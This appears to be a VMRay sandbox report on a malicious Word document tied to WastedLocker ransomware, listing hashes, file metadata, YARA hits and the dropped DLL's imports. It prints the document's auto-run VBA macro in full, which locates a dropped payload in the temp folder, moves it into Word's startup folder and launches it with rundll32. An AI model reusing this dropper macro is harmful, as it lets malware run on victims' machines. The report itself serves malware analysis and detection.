Try VMRay Platform
Malicious
Classifications

Ransomware Injector Downloader

Threat Names

WastedLocker Mal/HTMLGen-A Gen:Variant.Jacard.222844 Trojan.GenericKD.45628116 +2

Dynamic Analysis Report

Created on 2021-05-25T02:42:00

0524_4109399728218.doc

Word Document
...

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "16 minutes" to "2 minutes, 40 seconds" to reveal dormant functionality.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc Sample File Word Document
malicious
...
»
MIME Type application/msword
File Size 1.27 MB
MD5 14f4c470c207e22c3b0a4efa7b4200e8 Copy to Clipboard
SHA1 21180195396580a9ade32b589490cf3bc94d3b5b Copy to Clipboard
SHA256 0b22278ddb598d63f07eb983bcf307e0852cd3005c5bc15d4a4f26455562c8ec Copy to Clipboard
SSDeep 24576:nEIjrPUaphvGvGUZ93/semhXp7AsWIKHaY8k5faaboEy6r8zz1:n/jhvGvGU93097AFIKbv0WY/1 Copy to Clipboard
ImpHash -
AV Matches (2)
»
Threat Name Verdict
Gen:Variant.Jacard.222844
malicious
Gen:Variant.Jacard.222844
malicious
Office Information
»
Creator MyPc
Last Modified By MyPc
Revision 2
Create Time 2021-05-24 12:32:00+00:00
Modify Time 2021-05-24 12:32:00+00:00
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 3
Character Count 21
Chars With Spaces 23
scale_crop False
shared_doc False
Controls (2)
»
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
{0003000C-0000-0000-C000-000000000046} Package EmbeddedFile
VBA Macros (1)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Compare Text
Option Explicit
Dim pafs As String

Private Sub Document_Open()
Dim uis As String
uis = Options.DefaultFilePath(wdStartupPath)
If Dir(uis & "\ket.t") = "" Then
Call yyy

Call xxx

If pafs = "" Then

Else
Dim iel As String
Dim ued As String
ued = ".exe"
iel = Options.DefaultFilePath(wdStartupPath)
Name pafs As iel & "\ket.t"
Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
End If
End If
End Sub
Sub xxx()

 Dim FSO As Object
   Set FSO = CreateObject("Scripting.FileSystemObject")
Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath))
End Sub
Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub

 
 Sub Search(mds As Object)
 Dim Mysob As Object
 Dim Fil As Object
  
   For Each Mysob In mds.SubFolders
     Search Mysob
   Next Mysob
   For Each Fil In mds.Files
   
   If Fil.Name = "jax.k" Then
       
        pafs = Fil
        End If
   Next Fil
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub
Document Content
» 

 EMBED Package
CFB Streams (19)
»
Name ID Size Actions
Root\Data 1 552.93 KB
...
Root\WordDocument 2 4.00 KB
...
Root\ObjectPool\_1683339676\EPRINT 5 4.85 KB
...
Root\ObjectPool\_1683339676\CompObj 6 76 Bytes
...
Root\ObjectPool\_1683339676\ObjInfo 7 6 Bytes
...
Root\ObjectPool\_1683339676\Ole10Native 8 704.28 KB
...
Root\Table 9 8.30 KB
...
Root\SummaryInformation 10 412 Bytes
...
Root\DocumentSummaryInformation 11 280 Bytes
...
Root\Macros\VBA\dir 14 514 Bytes
...
Root\Macros\VBA\__SRP_0 15 2.15 KB
...
Root\Macros\VBA\__SRP_1 16 193 Bytes
...
Root\Macros\VBA\__SRP_2 17 1.67 KB
...
Root\Macros\VBA\__SRP_3 18 322 Bytes
...
Root\Macros\VBA\ThisDocument 19 4.53 KB
...
Root\Macros\VBA\_VBA_PROJECT 20 2.68 KB
...
Root\Macros\PROJECT 21 373 Bytes
...
Root\Macros\PROJECTwm 22 41 Bytes
...
Root\CompObj 23 114 Bytes
...
YARA Matches (2)
»
Rule Name Rule Description Classification Score Actions
Document_Contains_Embedded_PE_File PE file inside a document; possible malware dropper -
3/5
...
Document_Contains_Embedded_PE_File PE file inside a document; possible malware dropper -
3/5
...
c:\users\keecfmwgj\appdata\local\temp\jax.k Dropped File Binary
malicious
...
»
Also Known As c:\users\keecfmwgj\appdata\roaming\microsoft\word\startup\ket.t (Dropped File)
MIME Type application/vnd.microsoft.portable-executable
File Size 704.00 KB
MD5 9dc6f214fc82d637de2f68f3c519d339 Copy to Clipboard
SHA1 aaa425f7377d405bea59b8adfb65afc0c8869886 Copy to Clipboard
SHA256 2a8b737a4752060a308c4312b7c0cf6c05cde5b370906286dea9cdd36f5aa613 Copy to Clipboard
SSDeep 12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:HKHaY8k5faaboEy6r8zz1 Copy to Clipboard
ImpHash 976cbee04383163867f763148191e313 Copy to Clipboard
AV Matches (1)
»
Threat Name Verdict
Gen:Variant.Jacard.222844
malicious
PE Information
»
Image Base 0x400000
Entry Point 0x492348
Size Of Code 0x91400
Size Of Initialized Data 0x1e800
File Type FileType.dll
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 1992-06-19 22:22:17+00:00
Sections (6)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
CODE 0x401000 0x91368 0x91400 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.52
DATA 0x493000 0x17a4 0x1800 0x91800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.33
BSS 0x495000 0xd25 0x0 0x93000 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.idata 0x496000 0x244a 0x2600 0x93000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.79
.reloc 0x499000 0xa918 0xaa00 0x95600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ 6.62
.rsrc 0x4a4000 0x10000 0x10000 0xa0000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ 6.15
Imports (16)
»
kernel32.dll (34)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DeleteCriticalSection - 0x496154 0x96154 0x93154 0x0
LeaveCriticalSection - 0x496158 0x96158 0x93158 0x0
EnterCriticalSection - 0x49615c 0x9615c 0x9315c 0x0
InitializeCriticalSection - 0x496160 0x96160 0x93160 0x0
VirtualFree - 0x496164 0x96164 0x93164 0x0
VirtualAlloc - 0x496168 0x96168 0x93168 0x0
LocalFree - 0x49616c 0x9616c 0x9316c 0x0
LocalAlloc - 0x496170 0x96170 0x93170 0x0
GetVersion - 0x496174 0x96174 0x93174 0x0
GetCurrentThreadId - 0x496178 0x96178 0x93178 0x0
InterlockedDecrement - 0x49617c 0x9617c 0x9317c 0x0
InterlockedIncrement - 0x496180 0x96180 0x93180 0x0
VirtualQuery - 0x496184 0x96184 0x93184 0x0
WideCharToMultiByte - 0x496188 0x96188 0x93188 0x0
MultiByteToWideChar - 0x49618c 0x9618c 0x9318c 0x0
lstrlenA - 0x496190 0x96190 0x93190 0x0
lstrcpynA - 0x496194 0x96194 0x93194 0x0
LoadLibraryExA - 0x496198 0x96198 0x93198 0x0
GetThreadLocale - 0x49619c 0x9619c 0x9319c 0x0
GetStartupInfoA - 0x4961a0 0x961a0 0x931a0 0x0
GetProcAddress - 0x4961a4 0x961a4 0x931a4 0x0
GetModuleHandleA - 0x4961a8 0x961a8 0x931a8 0x0
GetModuleFileNameA - 0x4961ac 0x961ac 0x931ac 0x0
GetLocaleInfoA - 0x4961b0 0x961b0 0x931b0 0x0
GetCommandLineA - 0x4961b4 0x961b4 0x931b4 0x0
FreeLibrary - 0x4961b8 0x961b8 0x931b8 0x0
FindFirstFileA - 0x4961bc 0x961bc 0x931bc 0x0
FindClose - 0x4961c0 0x961c0 0x931c0 0x0
ExitProcess - 0x4961c4 0x961c4 0x931c4 0x0
WriteFile - 0x4961c8 0x961c8 0x931c8 0x0
UnhandledExceptionFilter - 0x4961cc 0x961cc 0x931cc 0x0
RtlUnwind - 0x4961d0 0x961d0 0x931d0 0x0
RaiseException - 0x4961d4 0x961d4 0x931d4 0x0
GetStdHandle - 0x4961d8 0x961d8 0x931d8 0x0
user32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetKeyboardType - 0x4961e0 0x961e0 0x931e0 0x0
LoadStringA - 0x4961e4 0x961e4 0x931e4 0x0
MessageBoxA - 0x4961e8 0x961e8 0x931e8 0x0
CharNextA - 0x4961ec 0x961ec 0x931ec 0x0
advapi32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegQueryValueExA - 0x4961f4 0x961f4 0x931f4 0x0
RegOpenKeyExA - 0x4961f8 0x961f8 0x931f8 0x0
RegCloseKey - 0x4961fc 0x961fc 0x931fc 0x0
oleaut32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysFreeString - 0x496204 0x96204 0x93204 0x0
SysReAllocStringLen - 0x496208 0x96208 0x93208 0x0
SysAllocStringLen - 0x49620c 0x9620c 0x9320c 0x0
kernel32.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
TlsSetValue - 0x496214 0x96214 0x93214 0x0
TlsGetValue - 0x496218 0x96218 0x93218 0x0
TlsFree - 0x49621c 0x9621c 0x9321c 0x0
TlsAlloc - 0x496220 0x96220 0x93220 0x0
LocalFree - 0x496224 0x96224 0x93224 0x0
LocalAlloc - 0x496228 0x96228 0x93228 0x0
advapi32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegQueryValueExA - 0x496230 0x96230 0x93230 0x0
RegOpenKeyExA - 0x496234 0x96234 0x93234 0x0
RegCloseKey - 0x496238 0x96238 0x93238 0x0
kernel32.dll (69)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrcpyA - 0x496240 0x96240 0x93240 0x0
lstrcmpA - 0x496244 0x96244 0x93244 0x0
WriteFile - 0x496248 0x96248 0x93248 0x0
WaitForSingleObject - 0x49624c 0x9624c 0x9324c 0x0
VirtualQuery - 0x496250 0x96250 0x93250 0x0
VirtualAlloc - 0x496254 0x96254 0x93254 0x0
Sleep - 0x496258 0x96258 0x93258 0x0
SizeofResource - 0x49625c 0x9625c 0x9325c 0x0
SetThreadLocale - 0x496260 0x96260 0x93260 0x0
SetFilePointer - 0x496264 0x96264 0x93264 0x0
SetEvent - 0x496268 0x96268 0x93268 0x0
SetErrorMode - 0x49626c 0x9626c 0x9326c 0x0
SetEndOfFile - 0x496270 0x96270 0x93270 0x0
ResetEvent - 0x496274 0x96274 0x93274 0x0
ReadFile - 0x496278 0x96278 0x93278 0x0
MultiByteToWideChar - 0x49627c 0x9627c 0x9327c 0x0
MulDiv - 0x496280 0x96280 0x93280 0x0
LockResource - 0x496284 0x96284 0x93284 0x0
LoadResource - 0x496288 0x96288 0x93288 0x0
LoadLibraryA - 0x49628c 0x9628c 0x9328c 0x0
LeaveCriticalSection - 0x496290 0x96290 0x93290 0x0
InitializeCriticalSection - 0x496294 0x96294 0x93294 0x0
GlobalUnlock - 0x496298 0x96298 0x93298 0x0
GlobalReAlloc - 0x49629c 0x9629c 0x9329c 0x0
GlobalHandle - 0x4962a0 0x962a0 0x932a0 0x0
GlobalLock - 0x4962a4 0x962a4 0x932a4 0x0
GlobalFree - 0x4962a8 0x962a8 0x932a8 0x0
GlobalFindAtomA - 0x4962ac 0x962ac 0x932ac 0x0
GlobalDeleteAtom - 0x4962b0 0x962b0 0x932b0 0x0
GlobalAlloc - 0x4962b4 0x962b4 0x932b4 0x0
GlobalAddAtomA - 0x4962b8 0x962b8 0x932b8 0x0
GetVersionExA - 0x4962bc 0x962bc 0x932bc 0x0
GetVersion - 0x4962c0 0x962c0 0x932c0 0x0
GetTickCount - 0x4962c4 0x962c4 0x932c4 0x0
GetThreadLocale - 0x4962c8 0x962c8 0x932c8 0x0
GetSystemInfo - 0x4962cc 0x962cc 0x932cc 0x0
GetStringTypeExA - 0x4962d0 0x962d0 0x932d0 0x0
GetStdHandle - 0x4962d4 0x962d4 0x932d4 0x0
GetProcAddress - 0x4962d8 0x962d8 0x932d8 0x0
GetModuleHandleA - 0x4962dc 0x962dc 0x932dc 0x0
GetModuleFileNameA - 0x4962e0 0x962e0 0x932e0 0x0
GetLocaleInfoA - 0x4962e4 0x962e4 0x932e4 0x0
GetLocalTime - 0x4962e8 0x962e8 0x932e8 0x0
GetLastError - 0x4962ec 0x962ec 0x932ec 0x0
GetFullPathNameA - 0x4962f0 0x962f0 0x932f0 0x0
GetDiskFreeSpaceA - 0x4962f4 0x962f4 0x932f4 0x0
GetDateFormatA - 0x4962f8 0x962f8 0x932f8 0x0
GetCurrentThreadId - 0x4962fc 0x962fc 0x932fc 0x0
GetCurrentProcessId - 0x496300 0x96300 0x93300 0x0
GetCPInfo - 0x496304 0x96304 0x93304 0x0
GetACP - 0x496308 0x96308 0x93308 0x0
FreeResource - 0x49630c 0x9630c 0x9330c 0x0
InterlockedExchange - 0x496310 0x96310 0x93310 0x0
FreeLibrary - 0x496314 0x96314 0x93314 0x0
FormatMessageA - 0x496318 0x96318 0x93318 0x0
FindResourceA - 0x49631c 0x9631c 0x9331c 0x0
FindFirstFileA - 0x496320 0x96320 0x93320 0x0
FindClose - 0x496324 0x96324 0x93324 0x0
FileTimeToLocalFileTime - 0x496328 0x96328 0x93328 0x0
FileTimeToDosDateTime - 0x49632c 0x9632c 0x9332c 0x0
EnumCalendarInfoA - 0x496330 0x96330 0x93330 0x0
EnterCriticalSection - 0x496334 0x96334 0x93334 0x0
DeleteFileA - 0x496338 0x96338 0x93338 0x0
DeleteCriticalSection - 0x49633c 0x9633c 0x9333c 0x0
CreateThread - 0x496340 0x96340 0x93340 0x0
CreateFileA - 0x496344 0x96344 0x93344 0x0
CreateEventA - 0x496348 0x96348 0x93348 0x0
CompareStringA - 0x49634c 0x9634c 0x9334c 0x0
CloseHandle - 0x496350 0x96350 0x93350 0x0
version.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VerQueryValueA - 0x496358 0x96358 0x93358 0x0
GetFileVersionInfoSizeA - 0x49635c 0x9635c 0x9335c 0x0
GetFileVersionInfoA - 0x496360 0x96360 0x93360 0x0
gdi32.dll (70)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
UnrealizeObject - 0x496368 0x96368 0x93368 0x0
StretchBlt - 0x49636c 0x9636c 0x9336c 0x0
SetWindowOrgEx - 0x496370 0x96370 0x93370 0x0
SetWinMetaFileBits - 0x496374 0x96374 0x93374 0x0
SetViewportOrgEx - 0x496378 0x96378 0x93378 0x0
SetTextColor - 0x49637c 0x9637c 0x9337c 0x0
SetStretchBltMode - 0x496380 0x96380 0x93380 0x0
SetROP2 - 0x496384 0x96384 0x93384 0x0
SetPixel - 0x496388 0x96388 0x93388 0x0
SetEnhMetaFileBits - 0x49638c 0x9638c 0x9338c 0x0
SetDIBColorTable - 0x496390 0x96390 0x93390 0x0
SetBrushOrgEx - 0x496394 0x96394 0x93394 0x0
SetBkMode - 0x496398 0x96398 0x93398 0x0
SetBkColor - 0x49639c 0x9639c 0x9339c 0x0
SelectPalette - 0x4963a0 0x963a0 0x933a0 0x0
SelectObject - 0x4963a4 0x963a4 0x933a4 0x0
SaveDC - 0x4963a8 0x963a8 0x933a8 0x0
RestoreDC - 0x4963ac 0x963ac 0x933ac 0x0
Rectangle - 0x4963b0 0x963b0 0x933b0 0x0
RectVisible - 0x4963b4 0x963b4 0x933b4 0x0
RealizePalette - 0x4963b8 0x963b8 0x933b8 0x0
Polyline - 0x4963bc 0x963bc 0x933bc 0x0
Polygon - 0x4963c0 0x963c0 0x933c0 0x0
PlayEnhMetaFile - 0x4963c4 0x963c4 0x933c4 0x0
PatBlt - 0x4963c8 0x963c8 0x933c8 0x0
MoveToEx - 0x4963cc 0x963cc 0x933cc 0x0
MaskBlt - 0x4963d0 0x963d0 0x933d0 0x0
LineTo - 0x4963d4 0x963d4 0x933d4 0x0
IntersectClipRect - 0x4963d8 0x963d8 0x933d8 0x0
GetWindowOrgEx - 0x4963dc 0x963dc 0x933dc 0x0
GetWinMetaFileBits - 0x4963e0 0x963e0 0x933e0 0x0
GetTextMetricsA - 0x4963e4 0x963e4 0x933e4 0x0
GetTextExtentPointA - 0x4963e8 0x963e8 0x933e8 0x0
GetTextExtentPoint32A - 0x4963ec 0x963ec 0x933ec 0x0
GetSystemPaletteEntries - 0x4963f0 0x963f0 0x933f0 0x0
GetStockObject - 0x4963f4 0x963f4 0x933f4 0x0
GetPixel - 0x4963f8 0x963f8 0x933f8 0x0
GetPaletteEntries - 0x4963fc 0x963fc 0x933fc 0x0
GetObjectA - 0x496400 0x96400 0x93400 0x0
GetEnhMetaFilePaletteEntries - 0x496404 0x96404 0x93404 0x0
GetEnhMetaFileHeader - 0x496408 0x96408 0x93408 0x0
GetEnhMetaFileBits - 0x49640c 0x9640c 0x9340c 0x0
GetEnhMetaFileW - 0x496410 0x96410 0x93410 0x0
GetDeviceCaps - 0x496414 0x96414 0x93414 0x0
GetDIBits - 0x496418 0x96418 0x93418 0x0
GetDIBColorTable - 0x49641c 0x9641c 0x9341c 0x0
GetDCOrgEx - 0x496420 0x96420 0x93420 0x0
GetCurrentPositionEx - 0x496424 0x96424 0x93424 0x0
GetClipBox - 0x496428 0x96428 0x93428 0x0
GetBrushOrgEx - 0x49642c 0x9642c 0x9342c 0x0
GetBitmapBits - 0x496430 0x96430 0x93430 0x0
GdiFlush - 0x496434 0x96434 0x93434 0x0
ExcludeClipRect - 0x496438 0x96438 0x93438 0x0
DeleteObject - 0x49643c 0x9643c 0x9343c 0x0
DeleteEnhMetaFile - 0x496440 0x96440 0x93440 0x0
DeleteDC - 0x496444 0x96444 0x93444 0x0
CreateSolidBrush - 0x496448 0x96448 0x93448 0x0
CreatePenIndirect - 0x49644c 0x9644c 0x9344c 0x0
CreatePalette - 0x496450 0x96450 0x93450 0x0
CreateHalftonePalette - 0x496454 0x96454 0x93454 0x0
CreateFontIndirectA - 0x496458 0x96458 0x93458 0x0
CreateDIBitmap - 0x49645c 0x9645c 0x9345c 0x0
CreateDIBSection - 0x496460 0x96460 0x93460 0x0
CreateCompatibleDC - 0x496464 0x96464 0x93464 0x0
CreateCompatibleBitmap - 0x496468 0x96468 0x93468 0x0
CreateBrushIndirect - 0x49646c 0x9646c 0x9346c 0x0
CreateBitmap - 0x496470 0x96470 0x93470 0x0
CopyEnhMetaFileA - 0x496474 0x96474 0x93474 0x0
BitBlt - 0x496478 0x96478 0x93478 0x0
AddFontResourceA - 0x49647c 0x9647c 0x9347c 0x0
user32.dll (168)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateWindowExA - 0x496484 0x96484 0x93484 0x0
WindowFromPoint - 0x496488 0x96488 0x93488 0x0
WinHelpA - 0x49648c 0x9648c 0x9348c 0x0
WaitMessage - 0x496490 0x96490 0x93490 0x0
UpdateWindow - 0x496494 0x96494 0x93494 0x0
UnregisterClassA - 0x496498 0x96498 0x93498 0x0
UnhookWindowsHookEx - 0x49649c 0x9649c 0x9349c 0x0
TranslateMessage - 0x4964a0 0x964a0 0x934a0 0x0
TranslateMDISysAccel - 0x4964a4 0x964a4 0x934a4 0x0
TrackPopupMenu - 0x4964a8 0x964a8 0x934a8 0x0
SystemParametersInfoA - 0x4964ac 0x964ac 0x934ac 0x0
ShowWindow - 0x4964b0 0x964b0 0x934b0 0x0
ShowScrollBar - 0x4964b4 0x964b4 0x934b4 0x0
ShowOwnedPopups - 0x4964b8 0x964b8 0x934b8 0x0
ShowCursor - 0x4964bc 0x964bc 0x934bc 0x0
ShowCaret - 0x4964c0 0x964c0 0x934c0 0x0
SetWindowsHookExA - 0x4964c4 0x964c4 0x934c4 0x0
SetWindowTextA - 0x4964c8 0x964c8 0x934c8 0x0
SetWindowPos - 0x4964cc 0x964cc 0x934cc 0x0
SetWindowPlacement - 0x4964d0 0x964d0 0x934d0 0x0
SetWindowLongA - 0x4964d4 0x964d4 0x934d4 0x0
SetTimer - 0x4964d8 0x964d8 0x934d8 0x0
SetScrollRange - 0x4964dc 0x964dc 0x934dc 0x0
SetScrollPos - 0x4964e0 0x964e0 0x934e0 0x0
SetScrollInfo - 0x4964e4 0x964e4 0x934e4 0x0
SetRect - 0x4964e8 0x964e8 0x934e8 0x0
SetPropA - 0x4964ec 0x964ec 0x934ec 0x0
SetParent - 0x4964f0 0x964f0 0x934f0 0x0
SetMenuItemInfoA - 0x4964f4 0x964f4 0x934f4 0x0
SetMenu - 0x4964f8 0x964f8 0x934f8 0x0
SetForegroundWindow - 0x4964fc 0x964fc 0x934fc 0x0
SetFocus - 0x496500 0x96500 0x93500 0x0
SetCursor - 0x496504 0x96504 0x93504 0x0
SetClipboardData - 0x496508 0x96508 0x93508 0x0
SetClassLongA - 0x49650c 0x9650c 0x9350c 0x0
SetCapture - 0x496510 0x96510 0x93510 0x0
SetActiveWindow - 0x496514 0x96514 0x93514 0x0
SendMessageA - 0x496518 0x96518 0x93518 0x0
ScrollWindow - 0x49651c 0x9651c 0x9351c 0x0
ScreenToClient - 0x496520 0x96520 0x93520 0x0
RemovePropA - 0x496524 0x96524 0x93524 0x0
RemoveMenu - 0x496528 0x96528 0x93528 0x0
ReleaseDC - 0x49652c 0x9652c 0x9352c 0x0
ReleaseCapture - 0x496530 0x96530 0x93530 0x0
RegisterWindowMessageA - 0x496534 0x96534 0x93534 0x0
RegisterClipboardFormatA - 0x496538 0x96538 0x93538 0x0
RegisterClassA - 0x49653c 0x9653c 0x9353c 0x0
RedrawWindow - 0x496540 0x96540 0x93540 0x0
PtInRect - 0x496544 0x96544 0x93544 0x0
PostQuitMessage - 0x496548 0x96548 0x93548 0x0
PostMessageA - 0x49654c 0x9654c 0x9354c 0x0
PeekMessageA - 0x496550 0x96550 0x93550 0x0
OpenClipboard - 0x496554 0x96554 0x93554 0x0
OffsetRect - 0x496558 0x96558 0x93558 0x0
OemToCharA - 0x49655c 0x9655c 0x9355c 0x0
MessageBoxA - 0x496560 0x96560 0x93560 0x0
MessageBeep - 0x496564 0x96564 0x93564 0x0
MapWindowPoints - 0x496568 0x96568 0x93568 0x0
MapVirtualKeyA - 0x49656c 0x9656c 0x9356c 0x0
LoadStringA - 0x496570 0x96570 0x93570 0x0
LoadKeyboardLayoutA - 0x496574 0x96574 0x93574 0x0
LoadIconA - 0x496578 0x96578 0x93578 0x0
LoadCursorW - 0x49657c 0x9657c 0x9357c 0x0
LoadCursorA - 0x496580 0x96580 0x93580 0x0
LoadBitmapA - 0x496584 0x96584 0x93584 0x0
KillTimer - 0x496588 0x96588 0x93588 0x0
IsZoomed - 0x49658c 0x9658c 0x9358c 0x0
IsWindowVisible - 0x496590 0x96590 0x93590 0x0
IsWindowEnabled - 0x496594 0x96594 0x93594 0x0
IsWindow - 0x496598 0x96598 0x93598 0x0
IsRectEmpty - 0x49659c 0x9659c 0x9359c 0x0
IsIconic - 0x4965a0 0x965a0 0x935a0 0x0
IsDialogMessageA - 0x4965a4 0x965a4 0x935a4 0x0
IsChild - 0x4965a8 0x965a8 0x935a8 0x0
InvalidateRect - 0x4965ac 0x965ac 0x935ac 0x0
IntersectRect - 0x4965b0 0x965b0 0x935b0 0x0
InsertMenuItemA - 0x4965b4 0x965b4 0x935b4 0x0
InsertMenuA - 0x4965b8 0x965b8 0x935b8 0x0
InflateRect - 0x4965bc 0x965bc 0x935bc 0x0
HideCaret - 0x4965c0 0x965c0 0x935c0 0x0
GetWindowThreadProcessId - 0x4965c4 0x965c4 0x935c4 0x0
GetWindowTextA - 0x4965c8 0x965c8 0x935c8 0x0
GetWindowRect - 0x4965cc 0x965cc 0x935cc 0x0
GetWindowPlacement - 0x4965d0 0x965d0 0x935d0 0x0
GetWindowLongA - 0x4965d4 0x965d4 0x935d4 0x0
GetWindowDC - 0x4965d8 0x965d8 0x935d8 0x0
GetTopWindow - 0x4965dc 0x965dc 0x935dc 0x0
GetSystemMetrics - 0x4965e0 0x965e0 0x935e0 0x0
GetSystemMenu - 0x4965e4 0x965e4 0x935e4 0x0
GetSysColorBrush - 0x4965e8 0x965e8 0x935e8 0x0
GetSysColor - 0x4965ec 0x965ec 0x935ec 0x0
GetSubMenu - 0x4965f0 0x965f0 0x935f0 0x0
GetScrollRange - 0x4965f4 0x965f4 0x935f4 0x0
GetScrollPos - 0x4965f8 0x965f8 0x935f8 0x0
GetScrollInfo - 0x4965fc 0x965fc 0x935fc 0x0
GetPropA - 0x496600 0x96600 0x93600 0x0
GetParent - 0x496604 0x96604 0x93604 0x0
GetWindow - 0x496608 0x96608 0x93608 0x0
GetMenuStringA - 0x49660c 0x9660c 0x9360c 0x0
GetMenuState - 0x496610 0x96610 0x93610 0x0
GetMenuItemInfoA - 0x496614 0x96614 0x93614 0x0
GetMenuItemID - 0x496618 0x96618 0x93618 0x0
GetMenuItemCount - 0x49661c 0x9661c 0x9361c 0x0
GetMenu - 0x496620 0x96620 0x93620 0x0
GetLastActivePopup - 0x496624 0x96624 0x93624 0x0
GetKeyboardState - 0x496628 0x96628 0x93628 0x0
GetKeyboardLayoutList - 0x49662c 0x9662c 0x9362c 0x0
GetKeyboardLayout - 0x496630 0x96630 0x93630 0x0
GetKeyState - 0x496634 0x96634 0x93634 0x0
GetKeyNameTextA - 0x496638 0x96638 0x93638 0x0
GetIconInfo - 0x49663c 0x9663c 0x9363c 0x0
GetForegroundWindow - 0x496640 0x96640 0x93640 0x0
GetFocus - 0x496644 0x96644 0x93644 0x0
GetDesktopWindow - 0x496648 0x96648 0x93648 0x0
GetDCEx - 0x49664c 0x9664c 0x9364c 0x0
GetDC - 0x496650 0x96650 0x93650 0x0
GetCursorPos - 0x496654 0x96654 0x93654 0x0
GetCursor - 0x496658 0x96658 0x93658 0x0
GetClipboardData - 0x49665c 0x9665c 0x9365c 0x0
GetClientRect - 0x496660 0x96660 0x93660 0x0
GetClassNameA - 0x496664 0x96664 0x93664 0x0
GetClassInfoA - 0x496668 0x96668 0x93668 0x0
GetCapture - 0x49666c 0x9666c 0x9366c 0x0
GetAsyncKeyState - 0x496670 0x96670 0x93670 0x0
GetActiveWindow - 0x496674 0x96674 0x93674 0x0
FrameRect - 0x496678 0x96678 0x93678 0x0
FindWindowA - 0x49667c 0x9667c 0x9367c 0x0
FillRect - 0x496680 0x96680 0x93680 0x0
EqualRect - 0x496684 0x96684 0x93684 0x0
EnumWindows - 0x496688 0x96688 0x93688 0x0
EnumThreadWindows - 0x49668c 0x9668c 0x9368c 0x0
EndPaint - 0x496690 0x96690 0x93690 0x0
EnableWindow - 0x496694 0x96694 0x93694 0x0
EnableScrollBar - 0x496698 0x96698 0x93698 0x0
EnableMenuItem - 0x49669c 0x9669c 0x9369c 0x0
EmptyClipboard - 0x4966a0 0x966a0 0x936a0 0x0
DrawTextA - 0x4966a4 0x966a4 0x936a4 0x0
DrawStateA - 0x4966a8 0x966a8 0x936a8 0x0
DrawMenuBar - 0x4966ac 0x966ac 0x936ac 0x0
DrawIconEx - 0x4966b0 0x966b0 0x936b0 0x0
DrawIcon - 0x4966b4 0x966b4 0x936b4 0x0
DrawFrameControl - 0x4966b8 0x966b8 0x936b8 0x0
DrawEdge - 0x4966bc 0x966bc 0x936bc 0x0
DispatchMessageA - 0x4966c0 0x966c0 0x936c0 0x0
DestroyWindow - 0x4966c4 0x966c4 0x936c4 0x0
DestroyMenu - 0x4966c8 0x966c8 0x936c8 0x0
DestroyIcon - 0x4966cc 0x966cc 0x936cc 0x0
DestroyCursor - 0x4966d0 0x966d0 0x936d0 0x0
DeleteMenu - 0x4966d4 0x966d4 0x936d4 0x0
DefWindowProcA - 0x4966d8 0x966d8 0x936d8 0x0
DefMDIChildProcA - 0x4966dc 0x966dc 0x936dc 0x0
DefFrameProcA - 0x4966e0 0x966e0 0x936e0 0x0
CreatePopupMenu - 0x4966e4 0x966e4 0x936e4 0x0
CreateMenu - 0x4966e8 0x966e8 0x936e8 0x0
CreateIcon - 0x4966ec 0x966ec 0x936ec 0x0
CloseClipboard - 0x4966f0 0x966f0 0x936f0 0x0
ClientToScreen - 0x4966f4 0x966f4 0x936f4 0x0
CheckMenuItem - 0x4966f8 0x966f8 0x936f8 0x0
CallWindowProcA - 0x4966fc 0x966fc 0x936fc 0x0
CallNextHookEx - 0x496700 0x96700 0x93700 0x0
BeginPaint - 0x496704 0x96704 0x93704 0x0
CharNextA - 0x496708 0x96708 0x93708 0x0
CharLowerBuffA - 0x49670c 0x9670c 0x9370c 0x0
CharLowerA - 0x496710 0x96710 0x93710 0x0
CharUpperBuffA - 0x496714 0x96714 0x93714 0x0
CharToOemA - 0x496718 0x96718 0x93718 0x0
AdjustWindowRectEx - 0x49671c 0x9671c 0x9371c 0x0
ActivateKeyboardLayout - 0x496720 0x96720 0x93720 0x0
